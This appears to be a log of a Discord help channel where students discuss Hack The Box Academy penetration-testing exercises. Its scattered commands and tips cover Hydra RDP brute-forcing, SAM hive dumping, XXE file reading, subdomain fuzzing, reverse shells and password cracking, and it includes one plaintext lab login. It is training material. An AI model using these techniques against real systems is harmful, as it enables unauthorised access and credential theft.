@fathom pendant Marcielee bro i have created a shell script to find the python version and i have pasted pythonx x.y.z | x.y.z and i didn't try x.y XDDDDDDDD

Thats doing too much lmao

I looked at both but the "credentials" one doesn't list the exact credentials or at least I'm not reading it right

the other file lets me log in as the user from my VM tho

My secret was python<tab x3> and see the autocomplete suggestions

The question shows you the exact format to use.

I am using that format

oh nice one i thought i need to have it this pattern pythonx x.y.z | x.y.z

happy to chitchat with you, thx

I think I am not reading the file correctly

@cloud urchin can I DM you?

it says the user account but it doesn't say they password

There is no trick. You read the files in the directory as the question says. Once you find the credentials you input them into the answer box in the format it states. If it's not accepting it you either don't have the right credentials or aren't using the correct format.

ok thanks

hi there's only two files in one of the home directories. I'm looking at the one that should have the credentials. can I DM you to make sure I have the right file?

@cloud urchin I'm only asking because I think I may just have a formatting issue but I don't see how

ok

They meant the other user for question 2 😉

(You have to pivot first)

hi I solved question 2

so now I'm gonna take a break for a few hours and try again later.

but I will finish the skills assessment soon

I may continue the skills assessment tonight after I get some other work done

I'm in Password Attacks - Attacking SAM. Question 2. I have brought over the SAM, SYSTEM, AND SECURITY hives to my local machine successfully. When I try to run secretsdump.py on them, I get the following error repeatedly: 'NoneType' object is not subscriptable. I have tried copying the command directly from the module, and I still get this error.

Any suggestions?

How did you move the files? Did you try different methods of file transfers? It's possible they got corrupted during the file transfer.

Can you DM your command and output?

Try using impacket-secretsdump instead of the .py file

otherwise what r1cky said may be on to something

I moved them using "move sam.save \10.10.15.16\CompData" on the remote windows machine.

One interesting thing I've noticed is that all three of them are exactly the same size, and generate the exact same hash

That's while still on the remote machine

Can someone please help me with the Attacking Thick Client Applications? I'm honestly lost on what to do and I'm not able to find or do certain things that the module is saying to do. I've been at this for awhile now. I can't change the permissions of the temp folder to disallow file deletions and it's preventing me from moving on.

That section is using HTB's "Fatty" box. Ippsec has a video on youtube tackling that box, it's helped people with that section of the module before, maybe it can help you. https://www.youtube.com/watch?v=3bvKLj0akMM

https://www.youtube.com/watch?v=3bvKLj0akMM

Are you sure this is similar to what's done in the section? Cause I'm honestly having a hard time understanding.

The section's target is that box.

Was able to solve the previous issue I had, just wasn't reading clearly, but I definitely feel like this section should be rewritten or something. Cause I was pretty lost going through it. I'll keep going through IppSec's video once I give my mind a rest and see if I can get anywhere.

Yeah I've seen a lot of complaints about that module, feels a bit out of place for the course.

@narrow fog I deleted your post because you linked to your pwnbox with the password that anyone could connect to. probably don't want to link that.

I am sorry I don't get what you're saying. I am new to this platform . I am not sure what I linked along with the module link for reference.

Did I just pasted my pwnbox url?

Yes, wrong link pasted

oops. Thank you

Password Attacks - Mutations:

"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."

Tried ssh, ftp & smb. What I am supossed to do now?

Regarding Puppy, why did Winrm prompt authentication failure when I changed the password of another account using my account? Before that, I was able to obtain a shell. Will changing the password by others affect me?

Best to ask for help with boxes in #boxes. You'll need to verify your account by following the instructions in #welcome to gain access to that channel (and most channels.)

can you do wc -l <mutated wordlist here> ? looking for a certain number of lines

Thanks, but we ended up sorting this out. It's unclear what's a spoiler and what I should post as an errata, but the DEV box and EXPLOIT box don't appear to be the same

looks like you're short... about 70000 lines

did you use the mutations in the section or in the resources?

Resources.

can't recall which one is more comprehensive

Are there any alternatives for fixing this problem then?

Well I can't remember exactly but I know you'd have to regenerate your mutated wordlist, makesure it's about 90k lines long

Hello

You using the mutation rule with almost a thousand lines?

94044. Should be fine now right?

Seems about right

now just extend target time as much as possible cos it took mine 2 hours to get

Did you do FTP or SMB?

FTP, it's the fastest

Heya! Welcome to HTB Discord server, please read #rules and get your account identified, #welcome has the instructions. And you'll be able to access other channels

Hey all, I'm doing the Network Foundations module, but in the Wireless Networks section, I think there may be a bug on this question: What is used by a mobile hotspot to connect devices to the internet? (Format: two words)

NVM ! it just took a bit of time

@plain folio don't just give answers;
@rustic sage i suggest reading the module as the answers typically lie in the reading

you can adjust the threads with -t

~48 - 56 threads seems to be the most stable while being the fastest

Hello. Just joined

Welcome. Read the #rules and instructions in #welcome to gain access to most of the server.

I'll be sure to check it out

Ada orang indo ga di sini

English only please

Ok

• “Is there any Indonesian here

This channel is dedicated for discussion of the various modules on the Academy platform. This question is better for something like #general. Please read the #rules and follow the instructions in #welcome to gain access to #general and most of the server.

Okay so back again and still having issues with Attacking Thick Client Applications. I watched the Ippsec video and he doesn't exactly cover the section I'm stuck on, he covers the section following it. I've went ahead and tried following the instructions for the section I'm on where you have to retrieve the hardcoded credentials by first restarting OracleService.exe and use ProcMon64 to find the process for it, but I'm unable to find it. At this point, I'm stuck on what to do, and this section does not explain the process well at all. I could really use some guidance on this.

isn't it that you have to analyze it in 64dbg to find that?

this one i was able to do it step-by-step and it worked just fine

Did you transfer the files over to a local machine? cos I found the RDP annoyingly slow

but tbf, the thick client sections are the worst sections of that module

nope i ran it all on the target

Module: 👶
Thick Client sections: 😈

Yeah for the web exploitation part of it I followed 0xdf and ippsec (doesn't help that they have different methods) and still had to do some java compilation debugging that was never taught in the pathway... I really think those sections are out of place

Yes that's the one

make sure to put the right breakpoint and check in the bottom left if the application is paused before looking around for the memory address and dumping it

it can be annoying to find it if it keeps moving around

I've tried going through the steps multiple times and I'm unable to get the same results showed in the section. Was able to find the process after running ProcMon64 again but at the Permission Entry for Temp portion where you have to change permissions, it's saying permission denied even though I was able to change the permissions a few hours ago on my first attempt. Very confusing. I'm also not getting the .bat or .tmp file you're supposed to get either in the Temp folder.

Well of course you wouldn't find the files as they're deleted immediately, which is why you have to disallow deletions. If you don't have permissions I'd restart the target

Makes sense, restarting it now so hopefully it will work next go around

Also carefully choose which principal's permissions to edit

I'm assuming I should be editing cybervaca's permissions right? Cause I was able to do that but after restarting OracleService.exe and looking in the temp folder, the .tmp and .bat files still don't show up.

Maybe choose a broader scope like a group

Again same problem 😔 :- now just guide me how to and what to configure if we found anything like this ( IP + domain )

Yesterday I faced same issues but, one Gentelmen guide me and solved that but again I am facing same thing and even after repeating the that Gentelmen's steps I can't able to do

It's literally the exact same steps as last time

1. put <ip (don't include port)> <domain> <additional subdomains e.g test.inlanefreight.htb in /etc/hosts
   2: visit http://<domain>:<port> on browser
2. You'll have to add additional subdomains if you find them otherwise you won't be able to access them

Copy the target number and try searching it on your browser

Send a screenshot when done

I able to access that but not able to brute force these IP or domain, but I will trying again your steps.......

Here what I encountered :-

Step 1 :- added IP in /etc/hosts file as instructed yesterday ✅

Step 2 : I also able to access the website with domain ✅

Step 3 : but when it comes to DNS bruteforcing, it doesn't works ❎

( I uploaded photos also step wise )

While DNS bruteforcing it says:- unable to validate base domain......

I think that's cos the server isn't hosting a DNS... someone should probably correct me on this one if I'm wrong

Then how I continue my learning 😔🥲 I have to skip this skill assessment ? Or any solution ?

you shouldnt skip any skill assessment

and are you using it like this? (inlanfreight.htb:port_here)

idk, use vhosts instead? which module and section is this exactly? there's a lot of em that deal with DNS fuzzing

Yes it works in browser but doesn't works in gobuster

try using port

Ok trying

otherwise follow what 0xW1Ld is saying

CPTS module 5 last lesson :- skill assessment

tell module name

Information gathering-web edition

sub module?

virtual hosts?

Last, skill assessment !

okok

use ports

with domain

In my opinion: go re-read the module, man's missing some key understanding

Ok trying......

he just needs to append :port with domain

idk if he tried that or no

he did

oh lemme recheck then

wrong mode

Ya

u got it?

It started bruteforcing but didn't found anything I tried this

Gobuster is bruteforcing but didn't found anything which is strange, it's not hard or medium lab 😰

try using vhost instead of dns

Ok trying....

The port must not be written to the hosts file.

oh yea ^ this too (i missed it)

Ohh

The Hosts file is responsible for name resolution, similar to an A or AAAA entry.

you had it right earlier, what happened?

he experimented ig xD

Gobuster not working in this scenario

it works just give url like this (domain:port)

It not accepta domain:port this format in DNS bruteforcing

do vhost bruteforce

Ya

Tried Vhost but it also keep bruteforcing not getting anything 🥲

Again it's not hard machine, butt.....

now we wait

now my second last option is chatGPT i am telling my problem and he try to resolve.......

Is someone able to explain something to me why in XXE file reading using the <!CDATA[[]]> tags does not work to read a file such as /etc/passwd, but works to read the specific file such as /flag.php?

As far as I can tell, there should be no reason why one can be read but the other can't, when both exist

I understand that the idea of using the CDATA tag is to make the XML program interpret it as raw data, but why isn't that possible with ALL files, only specific ones?

I get why you can't read index.php ( to avoid a self-reference loop for DOS protection ) but the inability to read /etc/passwd is confusing me

are you sure that /etc/passwd exists? Is it not a windows machine?

Yes, positive, I checked using the typical method too

Which works perfectly fine, but the CDATA techniques does not

I also know my .dtd file is being read, as I can see it making requests to the file from the python webserver

I'm gonna warrant it to a data size limit

you can get /etc/hosts fine right?

Yes I can!

I never considered that - how can I tell what the limit is?

I'm not really that experienced with xxe attacks, but I'd simply do trial and error and check if I can grab a substring of data

Fair enough - how else can you exfiltrate binary data if there's a limit though?

Thank you, by the way, I was getting very confused by that

hey, i tried chatGPT too but it also does't able to give me what i want. i finally skipping this skill assesment and one question from all :- IN REAL CPTS EXAM, CAN WE ENCOUTER THIS TYPE OF THINGS LIKE IP + DOMAIN BOTH ? IF YES THEN I DEFINATLY GONNA FAIL THE EXAM 😩 PLEASE ANSWER ME......................

mate calm down....

I AM CALMED SIR 😅 BUT just want to know, i have to suffer somthing like this in exam also ? BTW in CPTS exam i only gifted with the IP or both IP + DOMAIN ? like i mean to say that " exam is like solving CTF " (single IP) or anything elsee ?

the contents of the exam is not publicly disclosed, but it's highly likely that you'll deal with the same issue in future modules

You'll have to learn how to unstuck yourself, this is an easy module mind you.

ya, i tried every single trick yours and AI but none of these worked

It looks like you're close, from the messages I've seen

same, it's really just a waiting game with this

Hello guys, web cache posioning module, at the end of it “tools & prevention”, i have found the vulnerable parameter using wcvs, however i cant find the correct answer format for the question, any help?

i retried with dnsenum but this guy also spits same

We keep telling you: There's no DNS server on that host, you have to use gobuster vhost

tried but no response till at the end !

use a bigger list

like wayy bigger

ok trying.........................

wayy bigger

be prepared to wait a while you can also use the -t flag to increase the speed

Tbf 50 threads is pretty big... what t count do people use?

I use ffuf's default (40)

Haha nice

I use like 20 usually, maybe i should up it

I thought the threads were based on the number of available CPU cores - how is it allocated in FFUF/gobuster?

For instance, a 8 core cpu, with two threads for each core would be 16 threads

I think monitoring usage during the scan is the best i guess

threads are essentially virtual CPU cores, but increasing the threads in most these tools essentially means it starts more processes in parallel

Hi, I was wondering if there is rule of thumb to know when should we select eternalromance over eternalblue because it seems they are used interchangeably in the academy module. thanks!!

Yes the rule of thumb is: Use whichever one works

Hello,

if I can find more documentation regarding .This part .I want to understand it better.Seems some parts are missing

xD thats what i thought hahaha thanks!

short answer is they use different exec methods which largely depends on the permissions that are set for smb

oh i see, would that be something i can tell from nmap scan result or nah?

they'd more likely be from ldap or other sources of intel

ah okie i see, thanks heaps!

that make sense

but only foung 1

@junior fjord don't spoil the skill assessment please

don't spoil module content =+=

damn you quick

i literally just turned over

its not the answer

It's a step towards it

you're close, just do a lil digging around

its not any type of answer

is it the ffuf module or the fuzzing module?

also

ok

It's Info Gathering - Web

ah

yeah plenty of techniques used

ya

Gotta do a lil combining of techniques

i'm losing my touch, used to be able to determine based on the spoiled info

Go re-take the path

https://tenor.com/view/hazbik-mortal-combat-gif-3795006771601208806

Im doing the Skills Assesment in module "Information Gathering - Web Edition " ... is it better to recon manually for the exam or can i automated it? Any other results?

can you able to find the anser of 3 que ?

like you are not encountring any issues ?

yeah i did it

Make good Notes from the module and i have all commands at my "cheatsheet" and go from up to down...

hi not sure if this is okay but is it possible to use a pwnbox from htb academy on htb labs?

As far as I know, the labs have their own PwnBox.

can anyone help me to abuse ADCS ESC1 please?

I have requested successfully certificate for the privileged account (DA)

but the problem comes when I try to get the TGT with Rubeus asktgt, it shows me the error
KRB-ERROR (66) : KDC_ERR_CERTIFICATE_MISMATCH

I have searched and find out the issue is on the mapping process, so when I request cert, I add one more option is sidextension of the target account, but it still does not work

how can I get the TGT with the obtained cert?

Yeah the issue is that it has a 2h lifetime limit for free users

so I was wondering if it was possible to use the pwnbox from academy on labs

I think the Academy's PwnBox doesn't have access to the boxes.

I was thinking more like setting OVPN on the academy pwnbox

I tried it but got an error

Use your own VM instead

Just use your own VM, and get free experience with using VM's. You can't really lose.

I was following along with the Linux set up module on my laptop through VirtualBox using the parrot htb os. I got as far as LVM Passphrase following the general steps and creating my own passphrases and user login for my system. As I waited for the Debian program to finish installing. Once finished the system restarted as expected per the module but upon reboot I was not prompted with the encryption passphrase GRUB section as seen in the module and it seemed like the system had simply just restarted like the very beginning(when I originally started the VM). I am very confused as to why my system did not prompt me to enter any passphrase nor the option to login and boot up the operating system I just installed. If anyone may know where I went wrong or what may have happened please provide some guidance because I am completely lost.

can someone help me with "Remote/Reverse Port Forwarding with SSH" I can't seem to get a reverse shell from the target windows.
Link: https://academy.hackthebox.com/module/158/section/1427
I get logs but no reverse shell.

check dm, I'll try and help you out

These are screenshots of what im getting msfconsole, the logs from ssh -R and the command i used to create the payload

change the multi handler payload to match the one from msfvenom

Cheers, what a silly mistake

Only reason I know this: I've done it a lot

😆

Hello! I am having a problem in Sub-domain Fuzzing the link is here for modular page "https://academy.hackthebox.com/module/54/section/488" and this what I had typed "ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/" I also tried using http instead of https what seems to be problem all I got was all an Error? 😢

capital FUZZ in the url

FUZZ already been capitalized I just don't know why it show here not in lower case.

what error are you getting exactly?

Ummm I can't send the image even if I drag it here

Go identify your account, instructions in #welcome and you will be able to embed images here

I do not respond to unsolicited DMs

since you're using kali it's probably in /usr/share/wordlists/seclists/<same from here>

Okieeee. Thank you!

I left this running overnight, isn't it weird that it's not giving me any results?

Is the user it specifies to attack in the username list you used?

Yes.

Anyone can see Genesis ProLab listed?

Ok, wasn't sure. You can shoot me a DM and I can look at some things on your end.

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

Previous section we found the username and password, now it's asking to crack the password for the MySQL service, am i supposed to keep the same username I got and then enforce a custom rule to do

sam:pass
sam:pass1
....

?

Hey
Good morning 🌞
I'm new here 👋🏼

Hi
I’m at credential enumeration from window module.
How do i run powerview function

It’s AD enumeration and attacks module

If the previous section had you perform an attack against a specific user, I would use that username and if the answer was a password, I would use that username:password as the previous sections user credentials.

Did I do something wrong here?

It's telling you what is wrong in the output and is what W1LD mentioned.

If you don't know where it is, you can run sudo updatedb and then locate and the filename to see if it is on your VM.
Example:

/opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
/opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
/opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt```

Confirm the txt file if its there by catting it out

Oh I get it. Thanks!

for the question One of the pages you will identify should say 'You don't have access!'. What is the full page URL? in Web Fuzzing

i have found the url that displays the 'You don't have access', but for some reason it keep saying it's invalid when trying to submit it

i have been putting it in the format: http://vhost.academy.htb:port/directory/page.extension
i tried it without the http, with and without the port, checked for any spaces but yet i can't seem it to get it to accept my answer

Hi guys, Just a question, are there any active channels for pro-labs?

#1263635449335910531

#1263635449335910531 @icy dagger

read and follow #welcome

You can DM what you are trying.

Hey everyone, I just copped this cheap Wi-Fi adapter:
1300Mbps USB 3.0 WiFi Adapter Dual Band 2.4G/5Ghz, 4 Antennas, Realtek 8811CU chipset.
It was only $3.63, so I know it’s probably a gamble. Does anyone know if it supports monitor mode or packet injection on Kali Linux? Has anyone tried hacking with this chipset or similar super budget adapters?

Would really appreciate any advice or tips! Thanks in advance 🙏

hi! i started (and finished? ) the whole blind AEN thing im not sure if i achieved the goal since i didnt look at the step by step exercises .. is the "goal" to the blind AEN challenge to gain access to a domain admin account?

Hey all I'm on Attacking Common Apps and trying to learn Aquatone Reporting but it isn't quite doing what it's showing on the lesson. It's failing every screenshot request is there something specific I need to be doing? The EyeWitness report worked perfectly

hello guys, I'm new in HTB. I want to know why i need to do the Information Security Foundations. it is so boring and i don't get any good information or used one.

You don't NEED to do anything. It is just a starting point for new comers

you're free to not do the Information Security Foundations path

can anyone confirm? can i look at the module now? LOL

I didn't do it personally, I had little experience from game server hosting on Linux, so I decided to just skip it. I've been fine and just learnt as I go, other then that no other cybersec/linux knowledge. Just go for it 🙂

if you've got domain admin, you win

you can also do lateral movement from domain admin

deleting that for spoilers

ok thanks,
i have another question.
I'm in the SOC analyst.
I'm stack in Windows Event Logs & Finding Evil Module.
is there something that i need to learn first? for example there is recommendation tasks or modules from different paths that is at the bottom of my module. do i need to learn those first.

but now that you have domain admin, you may have gained access to something new

a bunch of machines... lots of them.. machines used by students

the SOC Analyst Prerequisites path covers what you need to know for the modules in the SOC Analyst path

Hey guys, I'm new to HTB, been at it for a week now and just joined the discord.

Is there a section to discuss Active Machines in the Lab section..?

Hi, I'm in the module Windows Privilege Escalation at Windows Server, when I try to rdp on the victim box with

xfreerdp /v:10.129.254.133 /u:htb-student /p:HTB_@cademy_stdnt!

I get this error :

[10:37:12:158] [46273:46274] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

does anybody have the same issue ?

What do you mean by active machines?

Non retired machines.

E.g. Titanic

#boxes

you can access the channel once you verify your account -> #welcome

Are you connected using a TCP vpn to HTB?

Oh, no access to that channel atm @dark hedge I must have to do something. I'll figure it out!

I've got the + and been using pwnbox

using the pwnbox

yes, i stated what you must do already

You need to link your htb account to discord

Thanks guys, I'll get sorted 🙂

Try using rdesktop instead of xfreerdp

If you can change the pwnbox to udp it should work smother. That module has a lot of connection issues so regularly restarting can help

rdesktop is working ! thanks

are there any HTB machines to further practice the module "port forwarding, pivoting, tunneling" or it is just something that will be practiced anyway with further learning

Yes I believe the ProLabs will test your skills on that (13 labs infact that include the module)

https://academy.hackthebox.com/academy-relations/modules/pivoting-tunneling-and-port-forwarding

The Academy x HTB Labs is very useful to find boxes that will test your theory on that

Hi, I am at the SCCM site takeover II section of the MSSQL, Exchange and SCCM attacks module, and when running the relay-sccm-adminservice branch of impacket I get the following error:

[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
Traceback (most recent call last):
  File "/home/kali/cape/mssql_exchange_sccm_attacks/sccm/relay-sccm/examples/ntlmrelayx.py", line 490, in <module>
    c = start_servers(options, threads)
  File "/home/kali/cape/mssql_exchange_sccm_attacks/sccm/relay-sccm/examples/ntlmrelayx.py", line 208, in start_servers
    c.setisADMINAttack(options.adminservice, options.logonname, options.displayname, options.objectsid)
    ^^^^^^^^^^^^^^^^^^
AttributeError: 'NTLMRelayxConfig' object has no attribute 'setisADMINAttack'. Did you mean: 'setIsADCSAttack'?```

Anyone have some ideas of why this is happening?

thanks alot

yo guys im on attacking smtp section

└─$ telnet 10.129.254.45 25
Trying 10.129.254.45...
Connected to 10.129.254.45.
Escape character is '^]'.
220 WIN-02 ESMTP
USER anonymous
503 Bad sequence of commands
VRFY root
503 Bad sequence of commands
RCPT TO                   
503 Bad sequence of commands
^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B
503 Bad sequence of commands
USER root
503 Bad sequence of commands
USER Administrator
503 Bad sequence of commands

smtp server acting wired not recognizing any command

can you send the link of the module

(The specific page you are on)

https://academy.hackthebox.com/module/116/section/1173

the first question is "What is the available username for the domain inlanefreight.htb in the SMTP server?" did you manage to the the avalible username?

you first need to do that

but the smtp server dosent recognize commands

you need to use a tool that is specified in the page, with a userlist to find out the user

you are trying to log into the smpt service with a user that doesn't exist

mhm so i wont need any direct interaction by me ?

first find the user

alr

Okay

its a yes no question

what

do u like tacos

• okay

yes

Anyways

I did go throw it

I got the username

But brute forcing aganist it using the password list in the module not working for me

Hello can I please DM anyone about the sliver module -- would appreciate it

Can anyone provide guidance for the CBBH Path : Skill Assesment ; Using Web Proxies?

Are the Wi-fi modules on hackthebox good preparation for OSWP?

or are they generally good stuff?

make sure your sintax is correct

yeah everything seems correct

tried pop3, imap, both smtp servers

also tried with rockyou for 20 mins

nvm figured it out

Anyone had trouble moving the system.save file from the target on the attacking Sam section of password attacks?

Module : Sliver

Anyone can please help as to why my rubeus doesnt return output on Beacon as it did on Session?

are you moving it like in the module?

Correct, I’m trying to follow the modules, however, I’m about to do it another way lol.

Okay... so day 2 of trying to get through the first part of Attacking Thick Client Applications. I think there might honestly be something wrong with this exercise at this point. I talked about my issues in here yesterday but after trying to go through the exercise again I'm now unable to change the perms on the temp folder. Had this issue once or twice before but I've restarted the machine multiple times now and I'm still unable to change the perms when I was able to before.

Im not sure if it affects but maybe open cmd as administrator if you can

I did.

It partially copies. It’s as if the connection gets interrupted before it finishes

Or moves rather, I’m trying a copy now

Nope, copy doesn’t work either

It doesn’t help that it’s slow as hell RDPd into it.

Yeah, I even mapped a drive, and moved it with my mouse to the share. It’s losing connection before it can completely copy.

I gave up for now, I’m gonna try again when I get home to a better internet connection. Might have something to do with that, but I doubt or

It*

i have problem in Protected Archives : password attack , the brute forcing take log time '

I dont think sharing this here is allowed might get you banned

@paper jolt this really isn't a job board place

no module; iirc LaZagne is a python
no module named => you don't have the requisite python module installed

¯_(ツ)_/¯

i don't recall having issues

Mac sucks ¯_(ツ)_/¯

ugh!!!!

still breaks when I try to move the god damn system.save file

this is so frustrating......

Hey. Sometimes what u gain from that is much more than hacking -- ur learning to control your mind and emotions

I'm not frustrated because i'm stuck from confusion or lack of understanding. I'm stuck because I'm unable to move the system.save file from the box i'm RDPd into, as the connection breaks. I it moves fine with the pwnbox, however, the pwnbox is beyond frustrating....

are there any tips when it comes to looking for unmanaged PowerShell injection attacks?
Doing this module and I'm going through it, I feel like it does not really tell you how to detect it or ways to search for it, besides knowing where all the DLLs go.
lol

Have been facing some trouble related to brute-forcing RDP credentials using Hydra within Password Attacks > Network Services module. Can not seem to get a hit while using the provided wordlists. Below is the command I have been using:

hydra -L username.list -P password.list rdp://ip-address -f

Any pointers?

finally got it lol

Jeez

https://academy.hackthebox.com/module/54/section/511

they really gotta put formatting on here but is anyone able to tell me the format for this question?

One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

i have the site but idk it just keeps saying its wrong because of the format

In your answer instead of putting a numerical port as port, try just the actual word PORT and see if that is your issue.

yeah that worked, thanks. i feel like they should just put the format there but yk whatever

It might be in the hint but I could be wrong. It's been awhile.

yeah i think it was i didn't really read it much though i thought it was a hint to find the answer since it seems weird to have a hint to properly format an answer you already have

Have also attempted using crackmapexec with no luck either, not sure what other tools or options to give a try.

Nmap, look hard when you NMAP...it'll click

Sorry was meant for someone else

run NMAP, and just look at it as if you're looking into the abyss.... it'll click...

Ahh, got it, appreciate the help. Feel a bit stupid after the past hour but learning something new nonetheless lol

lol, I feel stupid everyday i'm logged into HTB brother.

Thats the past u -- now ur better

Hello. I'm on the "Getting Started" Module in the Pentester path... I'm doing the Nibbles box, and I'm all the way to trying to get the last reverse shell I need (For Root). I copy and paste everything and keep getting an error.... I have the initial foot hold and when I do the final sudo monitor.sh to execute, I get an error, but it doesn't kick me back to the shell... its stuck. If I CTRL+C, it takes me out of the shell entirely and I have to reset the entire box and do the steps again to get the shell back. (For some reason, setting up the NC listener again and using curl as before doesn't give me the shell back... but if I reset the box entirely, it does. I just want to cancel/get out of the command I'm running inside the shell without going all the way out.

Sorry, I'm tired and this quesiton was all over the place and incoherent. I hope I made enough sense for someone to help.

Hi everyone, I’m currently working on the skill assessment for the Advanced XSS and CSRF Exploitation module and I’ve hit a wall. Could someone please lend me a hand or point me in the right direction? Thanks in advance

Again :- I am in vulnerability assessment module and sub module is nessus skill assessment, but when I am trying to open nessus on given address it doesn't opening

How do I delete data from the database? I dont like this new version of Bloodhound

I want to enter data from another domain but I don't want it to be mixed up with this one.

Its for the bloodhound module

Attacking Common Applications {Attacking Applications Connecting to Services}
in walkthrough they used breakpoint on address but in solution its not address.
Can someone explain why?i got 0 clue lol

Good morning guys 🙂
How good are the wifi modules on academy? Is it a good prep for OSWP? Do I learn there everything?

don't post screenshots of modules above t0; your question was fine as it wasn't really spoiling anything; just be patient and someone may come along to assist you

just remember when you run mimikatz/hashdump/etc to dump the hashes of a machine, you're only dumping LOCAL hashes, there's no guarantee that the hashes/passwords will be the same across different machines in a network

if you're entirely sure you're doing everything right; try changing vpn regions (EU => US or US => EU) and trying again

sometimes that can actually make the difference

Hello regarding the bruteforcing module : the password list change on the first assesment and it's impossible to do how can I report it?

it's not impossible

The wordlist is missing the key words

I have proof

maybe other wordlists are better; if you're fully sure #1234357888114364508 is the place

Thanks

Im currently on repeating request finding the second flag, I've all commands but I'm still getting the same flag, what am I missing ?

Module: Cracking Passwords with Hashcat

Optional Exercises:

You are conducting a penetration test for your client Inlanefreight and have Responder log data from the tool running overnight. You obtained the NTLMv2 password hash for the adconnectsvc user but all attempts to crack it have been unsuccessful. Recently, however, you read about another method to obtain something usable when you have an NTLMv2 password hash. Checking the project files from the previous year you also have the last NTDS dump to work with. Using Hashcat, find a way that you can leverage the NTLMv2 hash to authenticate as this user within the domain. Submit this string as your answer. Download the file "hashcat_addtnl_exercise.zip" from optional resources to get started.

Please, if anyone can help me to figure this one out. I know the answer (it's given to you if wanted) but cannot for the life of me figure out how to come to the conclusion.

From what I understand:
The responder log NTLMv2-SSP Hash is uncrackable for user (adconnectsvc)
The NTDS dump file does not contain the user adconnectsvc
The NTDS dump file is 3000+ users and one of these matches the user adconnectsvc, I assume this means they used the same password?
I know which user it is and I know the hash for the answer, but I am not able to connect the dots.

Would greatly appreciate some help here as I have spent a lot of time on this and would like to move on, without having to skip it.

I've almost completed the Linux Privilege Escalation and boi was it fun I am just struggling to get the 4th flag and have root access for the skills assessment

Hello. Im at module/35/section/223 im capturing the flag using the Network tab under browserdevtools. However upon refresh the request to flag file is not present

@soft moon please don't reveal info about the module since it's above tier 0

sorry

Hello, I'm stuck on a question on HTB, can anyone help? https://academy.hackthebox.com/module/195/section/2182 3rd question, thank you.

Why I can't send messages in general each time it sends me here

What will I learn in AI Red Teamer ?

there's a list of 3 instructions in #welcome

Stuff about breaking AI

Oh cool and what option should i choose to start my career like I mean as a newbie ?

Osint?

OSINT isn't a newbie thing

lmao

at least not in-depth OSINT

To me its look quiet easy I have seen ny brother who is preparing for oscp+ or something

i suggest the "Information Security Foundations" Skill Path

So anyways from where should i start

I want to be in red team

AI Red Teamer path != Red Teamer

and you're trying to run before you walk

start with the basics and the fundamentals and move from there

Xd point to be noted

Is it course ? And if it is then how long is it I mean day wise

https://academy.hackthebox.com/paths -> Information Security Foundations

it depends, how fast you learn and how well you take notes and retain information

On what platform should I make my notes ?

I use Obsidian, some people use Cherry Tree or Notion

Yeah I got but just want to know that the course is about 15 dayd or 30

All are free ? i mean those notes platform sorry for half message

not all of HTB content is free i think a couple are tier 1; but the tier 0 modules are "free"

Yes

Note taking tools mentioned are free

¯_(ツ)_/¯

Ok noted

Which one did you use?

they are just starting out

so i don't think they use any note taking software

My bad, terrible joke lol

literally saw their sibling studying for OSCP+ and thought "it's easy"

i don't wanna shatter their dreams

Having a sibling go through it must be pretty beneficial to be fair

And after this what should I have to do ?

Just starting

john hash2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2025-05-20 12:22) 0g/s 14787Kp/s 14787Kc/s 14787KC/s "2parrow"..*7¡Vamos!
Session completed. 
╭─kali@kali ~/doc 
╰─$ john hash2 --wordlist=/home/kali/Downloads/<*********> 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<*********>       (Notes.zip/notes.txt)     

Welcome

CPTS -> CAPE for penetration testing teqniques that would be valuable for red teaming; but i'm telling you now you won't be able to get a REd Team Job out the gate with no experience

why in the first cracking the pass it not work it stop and in the second it success crack the pass

not all wordlists are created equal

unless both wordlists are rockyou, then idk

Yeah I see tbh but I will manage

no they are not the same wordlist

I guess one wordlist just had better content

yes but the rockyou should work

idk why lol

I thought it did work.... unless i missread

Information Security Foundations is this course is in the form of notes or videos ?

There are generally no videos in the Academy

Notes with exercises usually

Is there anyone here who knows why I don't get a meterpreter shell in htb academy AD Enumeration & Attacks - Skills Assessment Part I, second question?

Hello all, any hint regds designing oracle at blind sql? i dont understand in which context to use suggested base query for rows...

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

user and password is found, just having issues not being able to figure what to do here

Password Attacks
Password reuse / default passwords

Do you mean you have put in the answer and it doesnt accept it?

No im supposed to just figure the mysql credentials

I'm confused by your question, so you haven't found the credentials?

Prev section i found the creds

Ah right okay

So now, i dont know what approach i need to take

Did you use the same method as the module?

The section gives you a cheatsheet you can use, the hint being default

You don't need to use any attacking tools

Yeah i figured, kind of but wasnt too sure

Cant access mysql inside of the ssh service

Hello

you should be able to

ERROR 1698 (28000): Access denied for user 'root'@'localhost'

hi guys!

im in the shells and payload module, and im trying to do the exercice of the php web shells, but i have a problem.

i can connect to the web, and the target host is alive, but when i try to access to some sections of the web it don't respond

i need to interact to the web because i must to perform a specific request and put the php payload on it

